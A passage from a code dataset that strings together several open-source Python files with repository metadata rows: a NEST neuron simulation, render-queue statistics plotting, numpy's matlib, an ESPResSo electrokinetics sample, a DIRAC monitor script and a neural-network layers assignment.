        nest.Connect(self.neuron, self.spike_recorder, 'all_to_all')
    def output_rate(self, mean, std):
        """Simulate one trial with noise (mean, std) and return the mean rate.

        The network is rebuilt from scratch for every trial so successive
        measurements are independent. The returned rate is in spikes/s,
        averaged over the population.
        """
        self.build()
        self.connect()
        #######################################################################
        # We adjust the parameters of the noise according to the current
        # values.
        self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.)
        # We simulate the network and calculate the rate.
        nest.Simulate(self.t_sim)
        rate = self.spike_recorder.n_events * 1000. / (1. * self.n_neurons * self.t_sim)
        return rate
    def compute_transfer(self, i_mean=(400.0, 900.0, 50.0),
                         i_std=(0.0, 600.0, 50.0)):
        """Measure rates on the (I_mean, I_std) grid given as range tuples.

        Results are stored on the instance: `i_range`, `std_range` and the
        2-D `rate` array indexed as rate[i_mean_index, i_std_index].
        """
        #######################################################################
        # We loop through all possible combinations of `(I_mean, I_sigma)`
        # and measure the output rate of the neuron.
        self.i_range = numpy.arange(*i_mean)
        self.std_range = numpy.arange(*i_std)
        self.rate = numpy.zeros((self.i_range.size, self.std_range.size))
        nest.set_verbosity('M_WARNING')
        for n, i in enumerate(self.i_range):
            print('I = {0}'.format(i))
            for m, std in enumerate(self.std_range):
                self.rate[n, m] = self.output_rate(i, std)
# Run the measurement over the default (I_mean, I_std) grid.
transfer = IF_curve(model, params)
transfer.compute_transfer()
###############################################################################
# After the simulation is finished, we store the data into a file for
# later analysis.
with shelve.open(model + '_transfer.dat') as dat:
    dat['I_mean'] = transfer.i_range
    dat['I_std'] = transfer.std_range
    dat['rate'] = transfer.rate
| stinebuu/nest-simulator | pynest/examples/if_curve.py | Python | gpl-2.0 | 5,196 | [
"NEURON"
] | 716db44925ea318ae7954f3acf41fa351645576d1242300083257b670d2caa2a |
# -*- coding: utf8 -*-
"""
"""
__author__ = "Jérôme Samson"
__copyright__ = "Copyright 2014, Mikros Image"
import os
import sys
import csv
import time
import datetime
from optparse import OptionParser
import numpy as np
import pygal
from pygal.style import *
try:
import simplejson as json
except ImportError:
import json
from octopus.dispatcher import settings
from octopus.core import singletonconfig
from pulitools.common import roundTime
from pulitools.common import lowerQuartile, higherQuartile
from pulitools.stats.common import createCommonParser, getRangeDates, prepareGraph, prepareScale, renderGraph
###########################################################################################################################
# Data example:
# {
# "prod":{
# "ddd" : { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2, "allocatedRN":5, "readyCommandCount":15},
# "dior_tea" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1, "allocatedRN":1, "readyCommandCount":15},
# },
# "user":{
# "brr" : { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2 , "allocatedRN":5, "readyCommandCount":15},
# "bho" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1 , "allocatedRN":1, "readyCommandCount":15},
# "lap" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1 , "allocatedRN":1, "readyCommandCount":15},
# },
# "step":{
# ...
# },
# "type":{
# ...
# },
# "total": { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2 , "allocatedRN":5, "readyCommandCount":150}
# "requestDate": "Wed Apr 2 12:16:01 2014"
# }
if __name__ == "__main__":
# # DBG
# startTime = time.time()
# prevTime = time.time()
# print ("%s - init timer" % (datetime.datetime.now()))
options, args = createCommonParser().parse_args()
if options.verbose:
print "Command options: %s" % options
print "Command arguments: %s" % args
if len(args) is not 2:
print "Error: 2 fields must be specified."
sys.exit(1)
else:
groupField = args[0]
graphValue = args[1]
startDate, endDate = getRangeDates( options )
if options.verbose:
print "Loading stats: %r " % options.sourceFile
print " - from: %r " % datetime.date.fromtimestamp(startDate)
print " - to: %r " % datetime.date.fromtimestamp(endDate)
print "Start."
    strScale=[]
    scale=[]
    data2Dim = {}
    log = []
    #
    # Load json log and filter by date
    # Optim done to have a fast dataset:
    # - read the whole file without parsing
    # - read resulting list in reversed order and parse each json line (mandatory due to the log format)
    # - filter and add data in range
    # - once we reached data too old: break the loop
    with open(options.sourceFile, "r" ) as f:
        raw_str = f.readlines()
    for line in reversed(raw_str):
        data = json.loads(line)
        if (startDate < data['requestDate'] and data['requestDate'] <= endDate):
            # Prepend so that "log" ends up in chronological order even though
            # the file is scanned newest-first.
            log.insert( 0, data )
        # We read by the end, if date is too old, no need to continue the parsing
        if data['requestDate'] < startDate:
            break
    # Build one time series per group key: data2Dim[key][i] holds the value
    # of graphValue for event i (0 when the key is absent from that event).
    for i, data in enumerate(log):
        eventDate = datetime.datetime.fromtimestamp( data['requestDate'] )
        for key, val in data[ groupField ].items():
            if key not in data2Dim:
                data2Dim[key] = np.array( [0]*len(log) )
            data2Dim[key][i] = val[ graphValue ]
        scale.append( eventDate )
    # Downsample each series to "resolution" points by averaging fixed-size
    # windows; leading events that do not fill a whole window are dropped
    # (only the last useableSize events are kept).
    stepSize = len(scale) / options.resolution
    newshape = (options.resolution, stepSize)
    useableSize = len(scale) - ( len(scale) % options.resolution )
    avgData = {}
    if options.verbose:
        print "stepSize=%d" % stepSize
        print "useableSize=%d" % useableSize
    for dataset in data2Dim.keys():
        avgData[dataset] = np.mean( np.reshape(data2Dim[dataset][-useableSize:], newshape), axis=1)
    #
    # Prepare scale
    #
    tmpscale = np.reshape(scale[-useableSize:], newshape)
    strScale = prepareScale( tmpscale, options )
    if options.verbose:
        print ("newshape %d = %r" % (len(newshape), newshape) )
        print ("data2Dim %d = %r" % (len(data2Dim), data2Dim) )
        print ("scale %d = %r" % (len(strScale), strScale) )
    if options.verbose:
        print "Num events: %d" % len(scale)
        print "Creating graph."
    # Create the pygal chart and add one series per group key.
    avg_usage = prepareGraph( options )
    avg_usage.title = options.title
    avg_usage.x_labels = strScale
    for key,val in avgData.items():
        avg_usage.add(key, val )
    renderGraph( avg_usage, options )
    if options.verbose:
        print "Done."
| mikrosimage/OpenRenderManagement | src/pulitools/stats/trace_queue_2dim.py | Python | bsd-3-clause | 6,873 | [
"Octopus"
] | 8a05610bf8e85653066e28b5e189e6375976470f77c67c06da6f335b0a317005 |
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.matrixlib.defmatrix import matrix, asmatrix
# need * as we're copying the numpy namespace
from numpy import *
__version__ = np.__version__
# Start from a copy of numpy's public namespace, then add the matlib-only
# helpers that have no numpy top-level counterpart.
__all__ = np.__all__[:] # copy numpy namespace
__all__ += ['rand', 'randn', 'repmat']
def empty(shape, dtype=None, order='C'):
    """Return a new matrix of given shape and type, without initializing
    entries.

    Parameters
    ----------
    shape : int or tuple of int
        Shape of the new matrix.
    dtype : data-type, optional
        Desired output data-type.
    order : {'C', 'F'}, optional
        Row-major (C-style) or column-major (Fortran-style) memory layout.

    Returns
    -------
    out : matrix
        Matrix whose entries are arbitrary (uninitialized) memory; callers
        must fill every element before reading.

    See Also
    --------
    empty_like, zeros
    """
    # Allocate storage directly on the matrix subclass; unlike zeros/ones
    # there is no fill pass, which makes this marginally faster.
    out = ndarray.__new__(matrix, shape, dtype, order=order)
    return out
def ones(shape, dtype=None, order='C'):
    """Return a matrix of given shape and type, filled with ones.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the matrix; a scalar or length-one shape ``N`` produces a
        single-row matrix of shape ``(1, N)``.
    dtype : data-type, optional
        Desired data-type, default is np.float64.
    order : {'C', 'F'}, optional
        C- or Fortran-contiguous storage order, default 'C'.

    Returns
    -------
    out : matrix
        Matrix of ones of the given shape, dtype and order.

    See Also
    --------
    ones, matlib.zeros
    """
    out = ndarray.__new__(matrix, shape, dtype, order=order)
    out.fill(1)
    return out
def zeros(shape, dtype=None, order='C'):
    """Return a matrix of given shape and type, filled with zeros.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the matrix; a scalar or length-one shape ``N`` produces a
        single-row matrix of shape ``(1, N)``.
    dtype : data-type, optional
        Desired data-type, default is float.
    order : {'C', 'F'}, optional
        C- or Fortran-contiguous storage order, default 'C'.

    Returns
    -------
    out : matrix
        Zero matrix of the given shape, dtype and order.

    See Also
    --------
    numpy.zeros, matlib.ones
    """
    out = ndarray.__new__(matrix, shape, dtype, order=order)
    out.fill(0)
    return out
def identity(n, dtype=None):
    """Return the square identity matrix of given size.

    Parameters
    ----------
    n : int
        Size of the returned identity matrix.
    dtype : data-type, optional
        Data-type of the output. Defaults to ``float``.

    Returns
    -------
    out : matrix
        `n` x `n` matrix with ones on the main diagonal, zeros elsewhere.

    See Also
    --------
    numpy.identity, matlib.eye
    """
    # The pattern [1, 0, ..., 0] of length n+1, tiled cyclically over the
    # n*n flat buffer, lands a 1 exactly on each diagonal element.
    diag_pattern = array([1] + n * [0], dtype=dtype)
    out = empty((n, n), dtype=dtype)
    out.flat = diag_pattern
    return out
def eye(n, M=None, k=0, dtype=float, order='C'):
    """Return a matrix with ones on the diagonal and zeros elsewhere.

    Parameters
    ----------
    n : int
        Number of rows in the output.
    M : int, optional
        Number of columns, defaults to `n`.
    k : int, optional
        Diagonal index: 0 is the main diagonal, positive values select an
        upper diagonal, negative values a lower one.
    dtype : dtype, optional
        Data-type of the returned matrix.
    order : {'C', 'F'}, optional
        Row-major (C-style) or column-major (Fortran-style) storage.

    Returns
    -------
    I : matrix
        `n` x `M` matrix that is zero everywhere except on the `k`-th
        diagonal, where it is one.

    See Also
    --------
    numpy.eye, matlib.identity
    """
    # Delegate to numpy.eye and wrap the result in the matrix subclass.
    arr = np.eye(n, M=M, k=k, dtype=dtype, order=order)
    return asmatrix(arr)
def rand(*args):
    """Return a matrix of random values with given shape.

    Samples are drawn from a uniform distribution over ``[0, 1)``.

    Parameters
    ----------
    \\*args : Arguments
        Shape of the output: either N separate integers, or a single tuple
        giving the full shape. When the first argument is a tuple, any
        further arguments are ignored.

    Returns
    -------
    out : matrix
        Matrix of random values with the requested shape.

    See Also
    --------
    randn, numpy.random.rand
    """
    # A leading tuple carries the whole shape; otherwise the positional
    # integers are used directly.
    shape = args[0] if isinstance(args[0], tuple) else args
    return asmatrix(np.random.rand(*shape))
def randn(*args):
    """Return a random matrix sampled from the standard normal distribution.

    Entries are floats drawn from a univariate Gaussian of mean 0 and
    variance 1. For samples from ``N(mu, sigma**2)`` use
    ``sigma * np.matlib.randn(...) + mu``.

    Parameters
    ----------
    \\*args : Arguments
        Shape of the output: either N separate integers, or a single tuple
        giving the full shape (further arguments are then ignored).

    Returns
    -------
    Z : matrix of floats
        Matrix of standard-normal samples with the requested shape.

    See Also
    --------
    rand, numpy.random.randn
    """
    # Same shape handling as rand(): a leading tuple wins.
    shape = args[0] if isinstance(args[0], tuple) else args
    return asmatrix(np.random.randn(*shape))
def repmat(a, m, n):
    """
    Repeat a 0-D to 2-D array or matrix MxN times.

    Parameters
    ----------
    a : array_like
        The array or matrix to be repeated.
    m, n : int
        The number of times `a` is repeated along the first and second axes.

    Returns
    -------
    out : ndarray
        The result of repeating `a`, with shape (rows(a)*m, cols(a)*n).

    Examples
    --------
    >>> import numpy.matlib
    >>> np.matlib.repmat(np.arange(4), 2, 2)
    array([[0, 1, 2, 3, 0, 1, 2, 3],
           [0, 1, 2, 3, 0, 1, 2, 3]])
    """
    arr = asanyarray(a)
    # Determine the effective 2-D footprint of the input: scalars count as
    # 1x1, 1-D arrays as a single row.
    if arr.ndim == 0:
        base_rows, base_cols = 1, 1
    elif arr.ndim == 1:
        base_rows, base_cols = 1, arr.shape[0]
    else:
        base_rows, base_cols = arr.shape

    total_rows = base_rows * m
    total_cols = base_cols * n
    # Repeat row-wise first, then column-wise, then lay out the final shape.
    tiled = (arr.reshape(1, arr.size)
                .repeat(m, 0)
                .reshape(total_rows, base_cols)
                .repeat(n, 0))
    return tiled.reshape(total_rows, total_cols)
| shoyer/numpy | numpy/matlib.py | Python | bsd-3-clause | 9,694 | [
"Gaussian"
] | 614f25041b63f1f25f0d49ea60896b141401d047e40f76f0bd07344cdf54425e |
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Set up an electrokinetics (LB) fluid confined between charged walls.
"""
import espressomd
required_features = ["ELECTROKINETICS", "EK_BOUNDARIES", "EXTERNAL_FORCES"]
espressomd.assert_features(required_features)
from espressomd import System, shapes, electrokinetics, ekboundaries
import os
# Simulation box and integration parameters.
system = System(box_l=[10, 10, 10])
system.cell_system.skin = 0.4
system.time_step = 0.1

# Lattice-Boltzmann based electrokinetics solver.
ek = electrokinetics.Electrokinetics(
    lb_density=1, friction=1, agrid=1, viscosity=1, T=1, prefactor=1)

# Two oppositely charged ionic species, driven in opposite directions along
# z by an external force density.
pos = electrokinetics.Species(
    density=0.05, D=0.1, valency=1, ext_force_density=[0, 0, 1.])
neg = electrokinetics.Species(
    density=0.05, D=0.1, valency=-1, ext_force_density=[0, 0, -1.])
ek.add_species(pos)
ek.add_species(neg)
system.actors.add(ek)

# Echo the solver and species parameters, plus one sample node density.
print(ek.get_params())
print(pos.get_params())
print(neg.get_params())
print(pos[5, 5, 5].density)

# Charged walls confining the fluid along x (negative on the left wall,
# positive on the right wall).
ek_wall_left = ekboundaries.EKBoundary(
    shape=shapes.Wall(dist=1, normal=[1, 0, 0]), charge_density=-0.01)
ek_wall_right = ekboundaries.EKBoundary(
    shape=shapes.Wall(dist=-9, normal=[-1, 0, 0]), charge_density=0.01)
system.ekboundaries.add(ek_wall_left)
system.ekboundaries.add(ek_wall_right)

# Output directory for the VTK snapshots written below.
if not os.path.isdir("ek"):
    os.makedirs("ek")

n_int_cycles = 1000
for i in range(n_int_cycles):
    system.integrator.run(100)
    print("\rIntegrating: %03i" % i, end='', flush=True)
    # Per-cycle VTK output: species densities and fluxes, fluid velocity,
    # and the boundary geometry.
    pos.print_vtk_density("ek/pos_dens_%i.vtk" % i)
    neg.print_vtk_density("ek/neg_dens_%i.vtk" % i)
    pos.print_vtk_flux("ek/pos_flux_%i.vtk" % i)
    neg.print_vtk_flux("ek/neg_flux_%i.vtk" % i)
    ek.print_vtk_velocity("ek/ekv_%i.vtk" % i)
    ek.print_vtk_boundary("ek/ekb_%i.vtk" % i)
| KaiSzuttor/espresso | samples/ekboundaries.py | Python | gpl-3.0 | 2,361 | [
"ESPResSo",
"VTK"
] | d356ea0e6e21f7f355473b2f64afc7fa669adeff07522d804a90767efd1d5bfe |
#!/usr/bin/env python
"""
Monitor the jobs present in the repository
Usage:
dirac-repo-monitor [options] ... RepoDir
Arguments:
RepoDir: Location of Job Repository
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
from DIRAC.Core.Utilities.DIRACScript import DIRACScript
@DIRACScript()
def main():
    """Monitor the jobs stored in a DIRAC job repository.

    Expects exactly one positional argument: the repository location.
    Exits with code 0 on success, 2 if the monitoring call fails.
    """
    Script.parseCommandLine(ignoreErrors=False)
    positional = Script.getPositionalArgs()
    if len(positional) != 1:
        Script.showHelp()
    repo_path = positional[0]

    # Imported lazily so the heavy API module is only loaded when needed.
    from DIRAC.Interfaces.API.Dirac import Dirac

    api = Dirac(withRepo=True, repoLocation=repo_path)
    status = api.monitorRepository(printOutput=True)
    exit_code = 0
    if not status['OK']:
        print('ERROR: ', status['Message'])
        exit_code = 2
    DIRAC.exit(exit_code)
# Standard script entry point.
if __name__ == "__main__":
    main()
| yujikato/DIRAC | src/DIRAC/Interfaces/scripts/dirac_repo_monitor.py | Python | gpl-3.0 | 907 | [
"DIRAC"
] | 732665c129c5998a246a2b4fa768ce7123cf23cb61cc76d7f65e604155094518 |
from builtins import range
import numpy as np
def affine_forward(x, w, b):
    """
    Forward pass for a fully-connected (affine) layer.

    Each example x[i] of shape (d_1, ..., d_k) is flattened to a vector of
    length D = d_1 * ... * d_k and mapped to an M-dimensional output via
    ``out = x_flat . w + b``.

    Inputs:
    - x: input data of shape (N, d_1, ..., d_k)
    - w: weights of shape (D, M)
    - b: biases of shape (M,)

    Returns a tuple of:
    - out: output of shape (N, M)
    - cache: (x, w, b), saved for the backward pass
    """
    num_examples = x.shape[0]
    # Flatten every example into one row vector before the matrix multiply.
    flat = x.reshape(num_examples, -1)
    out = flat.dot(w) + b
    cache = (x, w, b)
    return out, cache
def affine_backward(dout, cache):
    """
    Backward pass for a fully-connected (affine) layer.

    Inputs:
    - dout: upstream derivative, of shape (N, M)
    - cache: (x, w, b) tuple from affine_forward

    Returns a tuple of:
    - dx: gradient with respect to x, of shape (N, d_1, ..., d_k)
    - dw: gradient with respect to w, of shape (D, M)
    - db: gradient with respect to b, of shape (M,)
    """
    x, w, b = cache
    # Chain rule through out = flat . w + b, where flat is x reshaped to
    # (N, D); dx is restored to the original input shape at the end.
    flat = x.reshape(x.shape[0], -1)
    dw = flat.T.dot(dout)
    db = dout.sum(axis=0)
    dx = dout.dot(w.T).reshape(x.shape)
    return dx, dw, db
def relu_forward(x):
    """
    Forward pass for rectified linear units (ReLU): out = max(x, 0),
    applied elementwise.

    Input:
    - x: inputs, of any shape

    Returns a tuple of:
    - out: output, of the same shape as x (the input itself is untouched)
    - cache: x, saved for the backward pass
    """
    out = np.maximum(x, 0)
    cache = x
    return out, cache
def relu_backward(dout, cache):
    """
    Backward pass for rectified linear units (ReLU).

    The gradient passes through unchanged wherever the forward input was
    strictly positive, and is zero elsewhere.

    Input:
    - dout: upstream derivatives, of any shape
    - cache: input x from the forward pass, of the same shape as dout

    Returns:
    - dx: gradient with respect to x
    """
    x = cache
    return dout * (x > 0)
def batchnorm_forward(x, gamma, beta, bn_param):
    """
    Forward pass for batch normalization.

    During training the sample mean and (uncorrected) sample variance are
    computed from minibatch statistics and used to normalize the incoming
    data, while exponentially decaying running averages of mean and variance
    are maintained; at test time those running averages are used instead.

    Input:
    - x: Data of shape (N, D)
    - gamma: Scale parameter of shape (D,)
    - beta: Shift parameter of shape (D,)
    - bn_param: Dictionary with the following keys:
      - mode: 'train' or 'test'; required
      - eps: Constant for numeric stability
      - momentum: Constant for running mean / variance.
      - running_mean: Array of shape (D,) giving running mean of features
      - running_var: Array of shape (D,) giving running variance of features

    Returns a tuple of:
    - out: of shape (N, D)
    - cache: values needed in the backward pass ((x, gamma, eps) in train
      mode, None in test mode)

    Side effect: bn_param['running_mean'] and bn_param['running_var'] are
    updated in place.
    """
    mode = bn_param['mode']
    eps = bn_param.get('eps', 1e-5)
    momentum = bn_param.get('momentum', 0.9)
    N, D = x.shape
    running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))
    running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))
    out, cache = None, None
    if mode == 'train':
        # Per-feature batch statistics.  NOTE(review): eps is folded into
        # x_var *before* it is stored into running_var, so the running
        # variance accumulates eps too -- kept as-is because the backward
        # pass recomputes statistics with the same convention.
        x_mean = np.mean(x, axis=0)
        x_var = np.var(x, axis=0) + eps
        x_var_sqrt = np.sqrt(x_var)
        x_normalize = (x - x_mean) / x_var_sqrt
        # Learned per-feature scale (gamma) and shift (beta).
        out = gamma * x_normalize + beta
        # Exponentially decaying running averages used at test time.
        running_mean = momentum * running_mean + (1.0 - momentum) * x_mean
        running_var = momentum * running_var + (1.0 - momentum) * x_var
        # The backward pass recomputes mean/var from x, so caching
        # (x, gamma, eps) is sufficient.
        cache = (x, gamma, eps)
    elif mode == 'test':
        # Normalize with the stored running statistics; no cache is needed
        # since no backward pass happens at test time.
        x_normalize = (x - running_mean) / np.sqrt(running_var)
        out = gamma * x_normalize + beta
    else:
        raise ValueError('Invalid forward batchnorm mode "%s"' % mode)
    # Store the updated running means back into bn_param.
    bn_param['running_mean'] = running_mean
    bn_param['running_var'] = running_var
    return out, cache
def batchnorm_backward(dout, cache):
    """
    Backward pass for batch normalization, derived by propagating gradients
    through the computation graph node by node.

    Inputs:
    - dout: Upstream derivatives, of shape (N, D)
    - cache: (x, gamma, eps) from batchnorm_forward.

    Returns a tuple of:
    - dx: Gradient with respect to inputs x, of shape (N, D)
    - dgamma: Gradient with respect to scale parameter gamma, of shape (D,)
    - dbeta: Gradient with respect to shift parameter beta, of shape (D,)
    """
    dx, dgamma, dbeta = None, None, None
    # Recompute the forward-pass statistics (they were not cached).
    x, gamma, eps = cache
    x_mean = np.mean(x, axis=0)
    x_var = np.var(x, axis=0) + eps
    x_var_sqrt = np.sqrt(x_var)
    x_normalize = (x - x_mean) / x_var_sqrt
    N, D = x.shape
    # dbeta: out = gamma * x_hat + beta, so beta's gradient is the
    # per-feature sum of the upstream gradient.
    error_feature_wise = np.sum(dout, axis=0)  # 1 x D
    dbeta = error_feature_wise  # 1 x D
    # dgamma: gamma multiplies x_hat, so sum x_hat * dout per feature.
    dgamma = np.sum(x_normalize * dout, axis=0)  # 1 x D
    dx = np.zeros_like(x)
    # Gradient through the normalization x_hat = (x - mean) / sqrt(var):
    dnormalization = gamma * dout  # N x D
    # Direct path through the (x - mean) numerator.
    dx_u = 1.0 / x_var_sqrt * dnormalization
    # Path through 1/sqrt(var): multiply -> reciprocal -> sqrt -> mean-of-
    # squares -> (x - mean), one graph node at a time.
    dmul = (x - x_mean) * dnormalization
    d_1_by_x = -1 / x_var * dmul
    d_root_x = 1 / 2.0 * (x_var ** -0.5) * d_1_by_x
    d_sum_x = 1.0 / N * np.sum(d_root_x, axis=0)
    d_x_square = 2 * (x - x_mean) * d_sum_x
    dx_u += d_x_square
    # Finally, the mean itself depends on every x, contributing -1/N of the
    # column-summed gradient to each element.
    dx = dx_u + (-1.0 / N) * np.sum(dx_u, axis=0)
    return dx, dgamma, dbeta
def batchnorm_backward_alt(dout, cache):
    """
    Alternative backward pass for batch normalization, with the chain of
    intermediate graph nodes algebraically merged into fewer expressions.

    Expects the same cache as batchnorm_backward and returns the same
    gradients.

    Inputs / outputs: Same as batchnorm_backward
    """
    dx, dgamma, dbeta = None, None, None
    # Recompute the forward-pass statistics (they were not cached).
    x, gamma, eps = cache
    x_mean = np.mean(x, axis=0)
    x_var = np.var(x, axis=0) + eps
    x_var_sqrt = np.sqrt(x_var)
    x_normalize = (x - x_mean) / x_var_sqrt
    N, D = x.shape
    # Parameter gradients are identical to batchnorm_backward.
    error_feature_wise = np.sum(dout, axis=0)  # 1 x D
    dbeta = error_feature_wise  # 1 x D
    dgamma = np.sum(x_normalize * dout, axis=0)  # 1 x D
    dx = np.zeros_like(x)
    dnormalization = gamma * dout  # N x D
    # Variance path collapsed into a single expression up to the sum.
    dmean = -1 / 2.0 * (x - x_mean) * (x_var_sqrt) ** (-3) * dnormalization  # merge till sum
    dx_u = 2.0 / N * (x - x_mean) * np.sum(dmean, axis=0)  # merge from sum till (x-u)
    # Direct path through the (x - mean) numerator.
    dx_u += 1.0 / x_var_sqrt * dnormalization
    # Mean path: each element receives -1/N of the column-summed gradient.
    dx = dx_u + (-1.0 / N) * np.sum(dx_u, axis=0)
    return dx, dgamma, dbeta
def dropout_forward(x, dropout_param):
    """
    Forward pass for (inverted) dropout.

    Inputs:
    - x: input data, of any shape
    - dropout_param: dictionary with the keys:
      - p: keep probability; each activation survives with probability p
        (as implemented: the mask keeps entries where a uniform sample < p).
      - mode: 'train' applies dropout; 'test' returns the input unchanged.
      - seed: optional seed for the random number generator, making the
        function deterministic (needed for gradient checking).

    Outputs:
    - out: array of the same shape as x
    - cache: (dropout_param, mask); mask is the scaled dropout mask used in
      training mode, or None in test mode
    """
    p, mode = dropout_param['p'], dropout_param['mode']
    if 'seed' in dropout_param:
        np.random.seed(dropout_param['seed'])

    mask = None
    if mode == 'train':
        # Inverted dropout: rescale surviving units by 1/p at train time so
        # that no rescaling is needed at test time.
        mask = (np.random.random_sample(x.shape) < p) / p
        out = x * mask
    elif mode == 'test':
        out = x

    cache = (dropout_param, mask)
    out = out.astype(x.dtype, copy=False)
    return out, cache
def dropout_backward(dout, cache):
    """
    Backward pass for (inverted) dropout.

    Inputs:
    - dout: upstream derivatives, of any shape
    - cache: (dropout_param, mask) from dropout_forward

    Returns:
    - dx: gradient with respect to x
    """
    dropout_param, mask = cache
    mode = dropout_param['mode']
    if mode == 'train':
        # Gradient flows only through the kept (and 1/p-scaled) units.
        return dout * mask
    if mode == 'test':
        return dout
    return None
def conv_forward_naive(x, w, b, conv_param):
    """
    A naive implementation of the forward pass for a convolutional layer.

    The input consists of N data points, each with C channels, height H and
    width W. We convolve each input with F different filters, where each
    filter spans all C channels and has height HH and width WW.

    Input:
    - x: Input data of shape (N, C, H, W)
    - w: Filter weights of shape (F, C, HH, WW)
    - b: Biases, of shape (F,)
    - conv_param: A dictionary with the following keys:
      - 'stride': The number of pixels between adjacent receptive fields in
        the horizontal and vertical directions.
      - 'pad': The number of pixels that will be used to zero-pad the input.

    Returns a tuple of:
    - out: Output data, of shape (N, F, H', W') where H' and W' are given by
      H' = 1 + (H + 2 * pad - HH) / stride
      W' = 1 + (W + 2 * pad - WW) / stride
    - cache: (x, w, b, conv_param)
    """
    out = None
    pad = conv_param['pad']
    stride = conv_param['stride']
    N, C, H, W = x.shape
    F, C, HH, WW = w.shape
    # Output spatial dimensions from the standard convolution arithmetic.
    H_r = int(1 + (H + 2 * pad - HH) / stride)
    W_r = int(1 + (W + 2 * pad - WW) / stride)
    out = np.zeros((N, F, H_r, W_r))
    # Zero-pad only the spatial axes (H, W); N and C are untouched.
    padding_tuple = ((0, 0), (0, 0), (pad, pad), (pad, pad))
    x_padded = np.pad(x, padding_tuple, 'constant')
    # Slide the receptive field over every output position.
    for h in range(H_r):
        for wd in range(W_r):
            lh = h * stride  # top edge of the window
            lr = lh + HH  # bottom edge of the window
            lw = wd * stride  # left edge of the window
            rw = lw + WW  # right edge of the window
            data = x_padded[:, :, lh:lr, lw:rw]  # N x C x HH x WW
            for f in range(F):
                # Elementwise product with filter f, summed over channel and
                # both spatial axes, plus the filter bias.
                cfilter = w[f]  # 1 x C x HH x WW
                res = cfilter * data  # N x C x HH x WW
                res_sum = np.sum(res, axis=(1, 2, 3)) + b[f]  # N x 1
                out[:, f, h, wd] = res_sum
    cache = (x, w, b, conv_param)
    return out, cache
def conv_backward_naive(dout, cache):
    """
    A naive implementation of the backward pass for a convolutional layer.

    Inputs:
    - dout: Upstream derivatives, of shape (N, F, H', W')
    - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive

    Returns a tuple of:
    - dx: Gradient with respect to x
    - dw: Gradient with respect to w
    - db: Gradient with respect to b
    """
    dx, dw, db = None, None, None
    x, w, b, conv_param = cache
    pad = conv_param['pad']
    stride = conv_param['stride']
    N, C, H, W = x.shape
    F, C, HH, WW = w.shape
    N, F, H_r, W_r = dout.shape
    # Initialize gradient accumulators.
    dx = np.zeros_like(x)
    dw = np.zeros_like(w)
    db = np.zeros_like(b)
    # Work in the padded coordinate system, as the forward pass did; dx is
    # un-padded at the end.
    padding_tuple = ((0, 0), (0, 0), (pad, pad), (pad, pad))
    x_padded = np.pad(x, padding_tuple, 'constant')
    dx_padded = np.zeros_like(x_padded)
    # Re-trace every forward window and accumulate its gradient
    # contributions.
    for h in range(H_r):
        for wd in range(W_r):
            lh = h * stride  # top edge of the window
            lr = lh + HH  # bottom edge of the window
            lw = wd * stride  # left edge of the window
            rw = lw + WW  # right edge of the window
            data = x_padded[:, :, lh:lr, lw:rw]  # N x C x HH x WW
            for f in range(F):
                # Upstream gradient at this output position, broadcastable
                # over the window.
                delta = dout[:, f, h, wd].reshape((N, 1, 1, 1))  # N x 1 x 1 x 1
                # dw: input window weighted by the upstream gradient, summed
                # over the batch; db: plain sum of the upstream gradient.
                dw[f] += np.sum(delta * data, axis=0)  # C x HH x WW
                db[f] += np.sum(dout[:, f, h, wd])  # 1
                # dx: filter weighted by the upstream gradient, accumulated
                # into the (possibly overlapping) window.
                dx_padded[:, :, lh:lr, lw:rw] += w[f] * delta  # N x C x HH x WW
    # Strip the padding to recover the gradient w.r.t. the original input.
    dx = dx_padded[:, :, pad:H + pad, pad:W + pad]
    return dx, dw, db
def max_pool_forward_naive(x, pool_param):
    """
    A naive forward pass for a max-pooling layer.

    Inputs:
    - x: input data, of shape (N, C, H, W)
    - pool_param: dictionary with the keys:
      - 'pool_height': height of each pooling region
      - 'pool_width': width of each pooling region
      - 'stride': distance between adjacent pooling regions

    Returns a tuple of:
    - out: pooled output, of shape (N, C, H', W')
    - cache: (x, pool_param), saved for the backward pass
    """
    ph = pool_param['pool_height']
    pw = pool_param['pool_width']
    stride = pool_param['stride']
    N, C, H, W = x.shape
    out_h = int(1 + (H - ph) / stride)
    out_w = int(1 + (W - pw) / stride)

    out = np.zeros((N, C, out_h, out_w))
    for row in range(out_h):
        top = row * stride
        for col in range(out_w):
            left = col * stride
            # Maximum over each pooling window, per sample and channel.
            window = x[:, :, top:top + ph, left:left + pw]
            out[:, :, row, col] = window.max(axis=(2, 3))

    cache = (x, pool_param)
    return out, cache
def max_pool_backward_naive(dout, cache):
    """
    A naive backward pass for a max-pooling layer.

    Routes each upstream gradient back to the location(s) of the maximum
    inside its pooling window.

    Inputs:
    - dout: upstream derivatives, of shape (N, C, H', W')
    - cache: (x, pool_param) tuple from the forward pass

    Returns:
    - dx: gradient with respect to x, of the same shape as x
    """
    x, pool_param = cache
    ph = pool_param['pool_height']
    pw = pool_param['pool_width']
    stride = pool_param['stride']
    dx = np.zeros_like(x)
    N, C, out_h, out_w = dout.shape
    for row in range(out_h):
        top = row * stride
